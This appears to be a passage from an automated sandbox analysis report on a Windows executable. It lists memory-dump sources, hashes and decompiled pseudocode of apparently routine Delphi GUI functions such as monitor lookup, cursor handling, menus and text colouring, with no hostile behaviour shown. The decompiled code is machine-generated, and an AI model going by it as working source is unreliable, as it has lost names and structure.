    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Delete$CriticalSection$Object
    • String ID: )A
    • API String ID: 378701848-2712435313
    • Opcode ID: fe17a8a8c413fea95bf5845a48d02e3332dbe8f1a0394c6c020836c5dc48c030
    • Instruction ID: 8cb403c4d6bd83fc790e0824a81a94f8238df61aba43c4b3fd4f0466644193af
    • Opcode Fuzzy Hash: fe17a8a8c413fea95bf5845a48d02e3332dbe8f1a0394c6c020836c5dc48c030
    • Instruction Fuzzy Hash: 1A0100703051018FC602FF7AEC82A5537A8EB41709B52853AF148AB2B2CB3DAD558F5E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E00422674(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t15;
    				void* _t16;
    				intOrPtr _t18;
    				signed int _t19;
    				void* _t20;
    				intOrPtr _t21;
    
    				_t19 = _a12;
    				if( *0x47b93b != 0) {
    					_t16 = 0;
    					if((_t19 & 0x00000003) != 0) {
    						L7:
    						_t16 = 0x12340042;
    					} else {
    						_t21 = _a4;
    						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
    							goto L7;
    						}
    					}
    				} else {
    					_t18 =  *0x47b91c; // 0x422674
    					 *0x47b91c = E004223DC(3, _t15, _t18, _t19, _t20);
    					_t16 =  *0x47b91c(_a4, _a8, _t19);
    				}
    				return _t16;
    			}

    APIs
    • GetSystemMetrics.USER32(00000000), ref: 004226C2
    • GetSystemMetrics.USER32(00000001), ref: 004226D4
      • Part of subcall function 004223DC: GetProcAddress.KERNEL32(745C0000,00000000), ref: 0042245C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: MetricsSystem$AddressProc
    • String ID: MonitorFromPoint$t&B
    • API String ID: 1792783759-279512042
    • Opcode ID: 091e179d08b7bf2d68c8b872db753bedd57ffbcfe8a7dc55854c962867b8c56d
    • Instruction ID: ce2432db17b2679b6663cebfca3f23656decf4f4bcd8f6936f0e96787b851a9f
    • Opcode Fuzzy Hash: 091e179d08b7bf2d68c8b872db753bedd57ffbcfe8a7dc55854c962867b8c56d
    • Instruction Fuzzy Hash: 2A018FB230112C7FDB008F65ED44B5EBB65EB54358F808027FB299B251C3B99D81DBA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E0042254C(intOrPtr* _a4, signed int _a8) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				intOrPtr* _t14;
    				intOrPtr _t16;
    				signed int _t17;
    				void* _t18;
    				void* _t19;
    
    				_t17 = _a8;
    				_t14 = _a4;
    				if( *0x47b93a != 0) {
    					_t19 = 0;
    					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
    						_t19 = 0x12340042;
    					}
    				} else {
    					_t16 =  *0x47b918; // 0x42254c
    					 *0x47b918 = E004223DC(2, _t14, _t16, _t17, _t18);
    					_t19 =  *0x47b918(_t14, _t17);
    				}
    				return _t19;
    			}

    APIs
    • GetSystemMetrics.USER32(00000000), ref: 0042259D
    • GetSystemMetrics.USER32(00000001), ref: 004225A9
      • Part of subcall function 004223DC: GetProcAddress.KERNEL32(745C0000,00000000), ref: 0042245C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: MetricsSystem$AddressProc
    • String ID: L%B$MonitorFromRect
    • API String ID: 1792783759-2746502784
    • Opcode ID: 9e372c43607e1fbc025afe3c63253c7892b9cccd086f8366b47bfe3b74f2fe40
    • Instruction ID: 089b6596411a76f101efcd3eb32e463643eea47367bb00420d7be0f5d702ef89
    • Opcode Fuzzy Hash: 9e372c43607e1fbc025afe3c63253c7892b9cccd086f8366b47bfe3b74f2fe40
    • Instruction Fuzzy Hash: ED018FB1700228BBD7208B14FA99716B754E740325F948466FB18CB356C3B8DDC09BF9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040CB0C() {
    				_Unknown_base(*)()* _t1;
    				struct HINSTANCE__* _t3;
    
    				_t1 = GetModuleHandleA("kernel32.dll");
    				_t3 = _t1;
    				if(_t3 != 0) {
    					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
    					 *0x479134 = _t1;
    				}
    				if( *0x479134 == 0) {
    					 *0x479134 = E004085C0;
    					return E004085C0;
    				}
    				return _t1;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040D5D5,00000000,0040D5E8), ref: 0040CB12
    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040CB23
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: GetDiskFreeSpaceExA$kernel32.dll
    • API String ID: 1646373207-3712701948
    • Opcode ID: 120b078a31e260d99c8a0445781d53517275d76df67d6c3987e5b6ac9ab3095c
    • Instruction ID: f5d9991338859320518574272b253108a6fd8a2abe6d3c5a2defb8d85a16c2a7
    • Opcode Fuzzy Hash: 120b078a31e260d99c8a0445781d53517275d76df67d6c3987e5b6ac9ab3095c
    • Instruction Fuzzy Hash: 5FD05EB0202342DEE7006BA47DC7B0633B4C300304F40213B6241762C1D67C9CA08A5C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E00429E68(intOrPtr* __eax, signed int __edx) {
    				intOrPtr _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				intOrPtr _t49;
    				intOrPtr _t50;
    				intOrPtr _t53;
    				intOrPtr _t54;
    				intOrPtr _t55;
    				intOrPtr _t56;
    				intOrPtr* _t60;
    				intOrPtr* _t62;
    				struct HICON__* _t65;
    				intOrPtr _t67;
    				intOrPtr* _t72;
    				intOrPtr _t74;
    				intOrPtr* _t75;
    				intOrPtr _t78;
    				intOrPtr _t80;
    				intOrPtr _t82;
    				intOrPtr _t84;
    				intOrPtr _t85;
    				struct HWND__* _t88;
    				intOrPtr _t89;
    				intOrPtr _t91;
    				intOrPtr* _t93;
    				intOrPtr _t97;
    				intOrPtr _t100;
    				intOrPtr _t102;
    				intOrPtr _t103;
    				intOrPtr _t104;
    				intOrPtr _t106;
    				struct HWND__* _t107;
    				intOrPtr _t108;
    				intOrPtr _t110;
    				intOrPtr _t114;
    				intOrPtr _t117;
    				char _t118;
    				intOrPtr _t119;
    				void* _t131;
    				intOrPtr _t135;
    				intOrPtr _t140;
    				intOrPtr* _t155;
    				void* _t158;
    				void* _t165;
    				void* _t166;
    
    				_t155 = __eax;
    				if( *0x47bb38 != 0) {
    					L3:
    					_t49 =  *0x47bb18; // 0x0
    					_t50 =  *0x47bb18; // 0x0
    					_t117 = E00429D48(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
    					if( *0x47bb38 == 0) {
    						_t168 =  *0x47bb3c;
    						if( *0x47bb3c != 0) {
    							_t106 =  *0x47bb2c; // 0x0
    							_t107 = GetDesktopWindow();
    							_t108 =  *0x47bb3c; // 0x0
    							E00433E08(_t108, _t107, _t168, _t106);
    						}
    					}
    					_t53 =  *0x47bb18; // 0x0
    					if( *((char*)(_t53 + 0x9b)) != 0) {
    						__eflags =  *0x47bb38;
    						_t6 =  &_v24;
    						 *_t6 =  *0x47bb38 != 0;
    						__eflags =  *_t6;
    						 *0x47bb38 = 2;
    					} else {
    						 *0x47bb38 = 1;
    						_v24 = 0;
    					}
    					_t54 =  *0x47bb1c; // 0x0
    					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
    						L12:
    						_t55 =  *0x47bb1c; // 0x0
    						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
    						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
    						_t56 =  *0x47bb1c; // 0x0
    						if( *((intOrPtr*)(_t56 + 4)) != 0) {
    							_t97 =  *0x47bb1c; // 0x0
    							E0042BA9C( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
    							_t100 =  *0x47bb1c; // 0x0
    							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
    							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
    						}
    						_t131 = E00429D98(2);
    						_t121 =  *_t155;
    						_t60 =  *0x47bb1c; // 0x0
    						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
    						if( *0x47bb3c != 0) {
    							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
    								_t82 =  *0x47bb3c; // 0x0
    								E00433DF0(_t82, _t158);
    								_t84 =  *0x47bb3c; // 0x0
    								_t177 =  *((char*)(_t84 + 0x6a));
    								if( *((char*)(_t84 + 0x6a)) != 0) {
    									_t121 =  *((intOrPtr*)(_t155 + 4));
    									_t85 =  *0x47bb3c; // 0x0
    									E00433EF0(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
    								} else {
    									_t88 = GetDesktopWindow();
    									_t121 =  *_t155;
    									_t89 =  *0x47bb3c; // 0x0
    									E00433E08(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
    								}
    							} else {
    								_t91 =  *0x47bb3c; // 0x0
    								E00433F64(_t91, _t131, __eflags);
    								_t93 =  *0x47a0fc; // 0x47bba0
    								SetCursor(E00449384( *_t93, _t121, _t158));
    							}
    						}
    						_t62 =  *0x47a0fc; // 0x47bba0
    						_t65 = SetCursor(E00449384( *_t62, _t121, _t158));
    						if( *0x47bb38 != 2) {
    							L32:
    							return _t65;
    						} else {
    							_t179 = _t117;
    							if(_t117 != 0) {
    								_t118 = E00429DD4(_t121);
    								_t67 =  *0x47bb1c; // 0x0
    								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
    								__eflags = _t118;
    								if(__eflags != 0) {
    									E0042BA9C(_t118,  &_v24, _t155);
    									_t65 = E00403674(_t118, __eflags);
    									_t135 =  *0x47bb1c; // 0x0
    									 *(_t135 + 0x54) = _t65;
    								} else {
    									_t78 =  *0x47bb1c; // 0x0
    									_t65 = E00403674( *((intOrPtr*)(_t78 + 4)), __eflags);
    									_t140 =  *0x47bb1c; // 0x0
    									 *(_t140 + 0x54) = _t65;
    								}
    							} else {
    								_push( *((intOrPtr*)(_t155 + 4)));
    								_t80 =  *0x47bb1c; // 0x0
    								_t65 = E00403674( *((intOrPtr*)(_t80 + 0x38)), _t179);
    							}
    							if( *0x47bb1c == 0) {
    								goto L32;
    							} else {
    								_t119 =  *0x47bb1c; // 0x0
    								_t41 = _t119 + 0x5c; // 0x5c
    								_t42 = _t119 + 0x44; // 0x44
    								_t65 = E00407D88(_t42, 0x10, _t41);
    								if(_t65 != 0) {
    									goto L32;
    								}
    								if(_v28 != 0) {
    									_t75 =  *0x47bb1c; // 0x0
    									 *((intOrPtr*)( *_t75 + 0x34))();
    								}
    								_t72 =  *0x47bb1c; // 0x0
    								 *((intOrPtr*)( *_t72 + 0x30))();
    								_t74 =  *0x47bb1c; // 0x0
    								asm("movsd");
    								asm("movsd");
    								asm("movsd");
    								asm("movsd");
    								return _t74;
    							}
    						}
    					}
    					_t65 = E00429D98(1);
    					if( *0x47bb1c == 0) {
    						goto L32;
    					}
    					_t102 =  *0x47bb1c; // 0x0
    					 *((intOrPtr*)(_t102 + 4)) = _t117;
    					_t103 =  *0x47bb1c; // 0x0
    					 *((intOrPtr*)(_t103 + 8)) = _v28;
    					_t104 =  *0x47bb1c; // 0x0
    					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
    					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
    					_t65 = E00429D98(0);
    					if( *0x47bb1c == 0) {
    						goto L32;
    					}
    					goto L12;
    				}
    				_t110 =  *0x47bb28; // 0x0
    				asm("cdq");
    				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x47bb34; // 0x0
    				if(_t165 >= 0) {
    					goto L3;
    				}
    				_t114 =  *0x47bb2c; // 0x0
    				asm("cdq");
    				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
    				_t166 = _t65 -  *0x47bb34; // 0x0
    				if(_t166 < 0) {
    					goto L32;
    				}
    				goto L3;
    			}

    APIs
    • GetDesktopWindow.USER32 ref: 00429EDC
    • GetDesktopWindow.USER32 ref: 0042A001
    • SetCursor.USER32(00000000), ref: 0042A056
      • Part of subcall function 00433F64: ShowCursor.USER32(000000FF,00000000,?,0042A031), ref: 00433F9B
    • SetCursor.USER32(00000000), ref: 0042A041
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Cursor$DesktopWindow$Show
    • String ID:
    • API String ID: 110329033-0
    • Opcode ID: 5adc1ad0dc37a8aef5984fde5492fef3c723530a5e966329ec43c9332b01d92d
    • Instruction ID: 93a6a0a64c56c74e8b56e29971334b161be8d7344b98dcfc9055ad9bb7b0aa9e
    • Opcode Fuzzy Hash: 5adc1ad0dc37a8aef5984fde5492fef3c723530a5e966329ec43c9332b01d92d
    • Instruction Fuzzy Hash: 1F9129B43002558FC704DF29E984F56B7E1EB48304F55C56AEC088B7AAD738EC91CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 39%
    			E00438DBC(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v28;
    				char _v44;
    				void* __edi;
    				void* __ebp;
    				void* _t46;
    				void* _t57;
    				intOrPtr _t85;
    				intOrPtr _t96;
    				void* _t117;
    				void* _t118;
    				void* _t127;
    				struct HDC__* _t136;
    				struct HDC__* _t137;
    				intOrPtr* _t138;
    				void* _t139;
    
    				_t119 = __ecx;
    				_t135 = __ecx;
    				_v8 = __edx;
    				_t118 = __eax;
    				_t46 = E0043895C(__eax);
    				if(_t46 != 0) {
    					_t142 = _a4;
    					if(_a4 == 0) {
    						__eflags =  *((intOrPtr*)(_t118 + 0x54));
    						if( *((intOrPtr*)(_t118 + 0x54)) == 0) {
    							_t138 = E0041FDD8(1);
    							 *((intOrPtr*)(_t118 + 0x54)) = _t138;
    							E00421118(_t138, 1);
    							 *((intOrPtr*)( *_t138 + 0x40))();
    							_t119 =  *_t138;
    							 *((intOrPtr*)( *_t138 + 0x34))();
    						}
    						E0041D034( *((intOrPtr*)(E004203A8( *((intOrPtr*)(_t118 + 0x54))) + 0x14)), _t119, 0xffffff, _t135, _t139, __eflags);
    						E00412A34(0,  *((intOrPtr*)(_t118 + 0x34)), 0,  &_v44,  *((intOrPtr*)(_t118 + 0x30)));
    						_push( &_v44);
    						_t57 = E004203A8( *((intOrPtr*)(_t118 + 0x54)));
    						_pop(_t127);
    						E0041D3D8(_t57, _t127);
    						_push(0);
    						_push(0);
    						_push(0xffffffff);
    						_push(0);
    						_push(0);
    						_push(0);
    						_push(0);
    						_push(E0041D6C0(E004203A8( *((intOrPtr*)(_t118 + 0x54)))));
    						_push(_v8);
    						_push(E00438A98(_t118));
    						L0040D6BC();
    						E00412A34(_a16, _a16 +  *((intOrPtr*)(_t118 + 0x34)), _a12,  &_v28, _a12 +  *((intOrPtr*)(_t118 + 0x30)));
    						_v12 = E0041D6C0(E004203A8( *((intOrPtr*)(_t118 + 0x54))));
    						E0041D034( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000014, _t135, _t139, __eflags);
    						_t136 = E0041D6C0(_t135);
    						SetTextColor(_t136, 0xffffff);
    						SetBkColor(_t136, 0);
    						_push(0xe20746);
    						_push(0);
    						_push(0);
    						_push(_v12);
    						_push( *((intOrPtr*)(_t118 + 0x30)));
    						_push( *((intOrPtr*)(_t118 + 0x34)));
    						_push(_a12 + 1);
    						_t85 = _a16 + 1;
    						__eflags = _t85;
    						_push(_t85);
    						_push(_t136);
    						L00406464();
    						E0041D034( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000010, _t135, _t139, _t85);
    						_t137 = E0041D6C0(_t135);
    						SetTextColor(_t137, 0xffffff);
    						SetBkColor(_t137, 0);
    						_push(0xe20746);
    						_push(0);
    						_push(0);
    						_push(_v12);
    						_push( *((intOrPtr*)(_t118 + 0x30)));
    						_push( *((intOrPtr*)(_t118 + 0x34)));
    						_push(_a12);
    						_t96 = _a16;
    						_push(_t96);
    						_push(_t137);
    						L00406464();
    						return _t96;
    					}
    					_push(_a8);
    					_push(E004387AC(_t142));
    					E00438D94(_t118, _t142);
    					_push(E004387AC(_t142));
    					_push(0);
    					_push(0);
    					_push(_a12);
    					_push(_a16);
    					_push(E0041D6C0(__ecx));
    					_push(_v8);
    					_t117 = E00438A98(_t118);
    					_push(_t117);
    					L0040D6BC();
    					return _t117;
    				}
    				return _t46;
    			}

    APIs
    • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00438F09
    • SetBkColor.GDI32(00000000,00000000), ref: 00438F11
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Color$Text
    • String ID:
    • API String ID: 657580467-0
    • Opcode ID: e6854b70c551e24966f49b06a9b09ee5c5a5c5d1ca0b9d67ed5738eac0efddca
    • Instruction ID: 66dceec0eeb5f6bf747066e52f20414c5e0489b7b3ddc7cbc40ec211e9bbd80e
    • Opcode Fuzzy Hash: e6854b70c551e24966f49b06a9b09ee5c5a5c5d1ca0b9d67ed5738eac0efddca
    • Instruction Fuzzy Hash: CA512A71700214AFCB50FF69DD82F9E77ECAF08314F10106AB904EB286CA78EC458B69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E004456BC(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				void* _t41;
    				void* _t54;
    				void* _t61;
    				struct HMENU__* _t64;
    				struct HMENU__* _t70;
    				intOrPtr _t77;
    				void* _t79;
    				intOrPtr _t81;
    				intOrPtr _t83;
    				intOrPtr _t87;
    				void* _t92;
    				intOrPtr _t97;
    				void* _t110;
    				intOrPtr _t112;
    				void* _t115;
    
    				_t93 = 0;
    				_v20 = 0;
    				_t112 = __edx;
    				_t92 = __eax;
    				_push(_t115);
    				_push(0x445882);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t115 + 0xfffffff0;
    				if(__edx == 0) {
    					L7:
    					_t39 =  *((intOrPtr*)(_t92 + 0x248));
    					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
    						E0043F1B8(_t39, 0, 0);
    					}
    					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t112 != 0 && ( *(_t112 + 0x1c) & 0x00000008) != 0) {
    						_t112 = 0;
    					}
    					 *((intOrPtr*)(_t92 + 0x248)) = _t112;
    					if(_t112 != 0) {
    						E004198D8(_t112, _t92);
    					}
    					if(_t112 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
    						_t41 = E0043286C(_t92);
    						__eflags = _t41;
    						if(_t41 != 0) {
    							SetMenu(E0043260C(_t92), 0);
    						}
    						goto L30;
    					} else {
    						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
    							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
    								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
    								if( *((char*)(_t92 + 0x22f)) != 1) {
    									_t54 = E0043286C(_t92);
    									__eflags = _t54;
    									if(_t54 != 0) {
    										SetMenu(E0043260C(_t92), 0);
    									}
    								}
    								goto L30;
    							}
    							goto L21;
    						} else {
    							L21:
    							if(E0043286C(_t92) != 0) {
    								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
    								_t64 = GetMenu(E0043260C(_t92));
    								_t137 = _t61 - _t64;
    								if(_t61 != _t64) {
    									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
    									SetMenu(E0043260C(_t92), _t70);
    								}
    								E0043F1B8(_t112, E0043260C(_t92), _t137);
    							}
    							L30:
    							if( *((char*)(_t92 + 0x22e)) != 0) {
    								E00446788(_t92, 1);
    							}
    							E004455F4(_t92);
    							_pop(_t97);
    							 *[fs:eax] = _t97;
    							_push(0x445889);
    							return E004041E0( &_v20);
    						}
    					}
    				}
    				_t77 =  *0x47bba0; // 0x2321310
    				_t79 = E00448EF0(_t77) - 1;
    				if(_t79 >= 0) {
    					_v8 = _t79 + 1;
    					_t110 = 0;
    					do {
    						_t81 =  *0x47bba0; // 0x2321310
    						if(_t112 ==  *((intOrPtr*)(E00448EDC(_t81, _t110) + 0x248))) {
    							_t83 =  *0x47bba0; // 0x2321310
    							if(_t92 != E00448EDC(_t83, _t110)) {
    								_v16 =  *((intOrPtr*)(_t112 + 8));
    								_v12 = 0xb;
    								_t87 =  *0x479e24; // 0x41ada4
    								E00405DCC(_t87, _t93,  &_v20);
    								_t93 = _v20;
    								E0040B658(_t92, _v20, 1, _t110, _t112, 0,  &_v16);
    								E00403BF4();
    							}
    						}
    						_t110 = _t110 + 1;
    						_t10 =  &_v8;
    						 *_t10 = _v8 - 1;
    					} while ( *_t10 != 0);
    				}
    			}

    APIs
    • GetMenu.USER32(00000000), ref: 004457E0
    • SetMenu.USER32(00000000,00000000), ref: 004457FD
    • SetMenu.USER32(00000000,00000000), ref: 00445832
    • SetMenu.USER32(00000000,00000000), ref: 0044584E
      • Part of subcall function 00405DCC: LoadStringA.USER32(00000000,00010000,?,00001000), ref: 00405DFE
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Menu$LoadString
    • String ID:
    • API String ID: 3688185913-0
    • Opcode ID: 20ae3c6edcc02cb74be7a27c94a3bd204569640db0132ce70140699fa4395ba9
    • Instruction ID: e6bd4c774160fe46b81cdb2d10287adcd4332764a8085048f4f7701a946707cb
    • Opcode Fuzzy Hash: 20ae3c6edcc02cb74be7a27c94a3bd204569640db0132ce70140699fa4395ba9
    • Instruction Fuzzy Hash: 8551BF30A04A449BEF20BF3AD98675A77949F04308F48847BAC059B397CE7CDC458B9C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E004298CC(intOrPtr __eax, void* __ecx, intOrPtr _a4) {
    				char _v5;
    				char _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				struct HWND__* _v24;
    				intOrPtr _v28;
    				char _v32;
    				struct tagRECT _v48;
    				struct tagRECT _v64;
    				struct HWND__* _t53;
    				intOrPtr _t55;
    				intOrPtr _t60;
    				intOrPtr _t65;
    				intOrPtr _t78;
    				intOrPtr _t84;
    				intOrPtr _t86;
    				intOrPtr _t93;
    				intOrPtr _t98;
    				intOrPtr _t101;
    				void* _t102;
    				intOrPtr* _t104;
    				intOrPtr _t106;
    				intOrPtr _t110;
    				intOrPtr _t112;
    				struct HWND__* _t113;
    				intOrPtr _t114;
    				intOrPtr _t116;
    				intOrPtr _t117;
    
    				_t102 = __ecx;
    				_t101 = __eax;
    				_v5 = 1;
    				_t113 = E00429D1C(_a4 + 0xfffffff7);
    				_v24 = _t113;
    				_t53 = GetWindow(_t113, 4);
    				_t104 =  *0x479fc4; // 0x47bb9c
    				_t4 =  *_t104 + 0x30; // 0x502b4
    				if(_t53 ==  *_t4) {
    					L6:
    					if(_v24 == 0) {
    						L25:
    						return _v5;
    					}
    					_t114 = _t101;
    					while(1) {
    						_t55 =  *((intOrPtr*)(_t114 + 0x30));
    						if(_t55 == 0) {
    							break;
    						}
    						_t114 = _t55;
    					}
    					_t112 = E0043260C(_t114);
    					_v28 = _t112;
    					if(_t112 == _v24) {
    						goto L25;
    					}
    					_t13 = _a4 - 0x10; // 0xe87d83e8
    					_t60 =  *((intOrPtr*)( *_t13 + 0x30));
    					if(_t60 == 0) {
    						_t19 = _a4 - 0x10; // 0xe87d83e8
    						_t106 =  *0x428474; // 0x4284c0
    						__eflags = E00403604( *_t19, _t106);
    						if(__eflags == 0) {
    							__eflags = 0;
    							_v32 = 0;
    						} else {
    							_t21 = _a4 - 0x10; // 0xe87d83e8
    							_v32 = E0043260C( *_t21);
    						}
    						L19:
    						_v12 = 0;
    						_t65 = _a4;
    						_v20 =  *((intOrPtr*)(_t65 - 9));
    						_v16 =  *((intOrPtr*)(_t65 - 5));
    						_push( &_v32);
    						_push(E00429860);
    						_push(GetCurrentThreadId());
    						L00406714();
    						_t126 = _v12;
    						if(_v12 == 0) {
    							goto L25;
    						}
    						GetWindowRect(_v24,  &_v48);
    						_push(_a4 + 0xfffffff7);
    						_push(_a4 - 1);
    						E00403674(_t101, _t126);
    						_t78 =  *0x47bb1c; // 0x0
    						_t110 =  *0x427254; // 0x4272a0
    						if(E00403604(_t78, _t110) == 0) {
    							L23:
    							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
    								_v5 = 0;
    							}
    							goto L25;
    						}
    						_t84 =  *0x47bb1c; // 0x0
    						if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x38)) + 0xa0)) == 0) {
    							goto L23;
    						}
    						_t86 =  *0x47bb1c; // 0x0
    						if(E0043260C( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x38)) + 0xa0))) == _v24) {
    							goto L25;
    						}
    						goto L23;
    					}
    					_t116 = _t60;
    					while(1) {
    						_t93 =  *((intOrPtr*)(_t116 + 0x30));
    						if(_t93 == 0) {
    							break;
    						}
    						_t116 = _t93;
    					}
    					_v32 = E0043260C(_t116);
    					goto L19;
    				}
    				_t117 = E00428E38(_v24, _t102);
    				if(_t117 == 0) {
    					goto L25;
    				} else {
    					while(1) {
    						_t98 =  *((intOrPtr*)(_t117 + 0x30));
    						if(_t98 == 0) {
    							break;
    						}
    						_t117 = _t98;
    					}
    					_v24 = E0043260C(_t117);
    					goto L6;
    				}
    			}

    APIs
      • Part of subcall function 00429D1C: WindowFromPoint.USER32(00429AF6,0047BB40,00000000,004298E6,?,-0000000C,?), ref: 00429D22
      • Part of subcall function 00429D1C: GetParent.USER32(00000000), ref: 00429D39
